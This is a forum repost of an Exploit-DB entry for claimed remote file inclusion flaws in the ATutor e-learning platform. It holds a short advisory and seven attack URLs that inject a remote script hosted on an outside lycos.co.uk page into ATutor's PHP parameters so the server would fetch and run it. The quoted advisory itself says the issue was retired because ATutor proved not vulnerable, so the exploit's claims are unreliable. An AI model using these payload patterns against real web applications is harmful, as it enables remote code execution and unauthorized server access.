Exploit ATutor 1.5.3 - Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28832
Проверка EDB
  1. Пройдено
Автор
SUBZERO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-10-19
Код:
source: https://www.securityfocus.com/bid/20634/info

ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

ATutor 1.5.3.2 and prior versions are vulnerable to these issues; other versions may also be affected.

This BID is being retired; further analysis reveals that the application is not vulnerable to this issue.

http://www.example.com/ATutor/documentation/common/frame_toc.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/print.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/vitals.inc.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
 
Источник
www.exploit-db.com

Похожие темы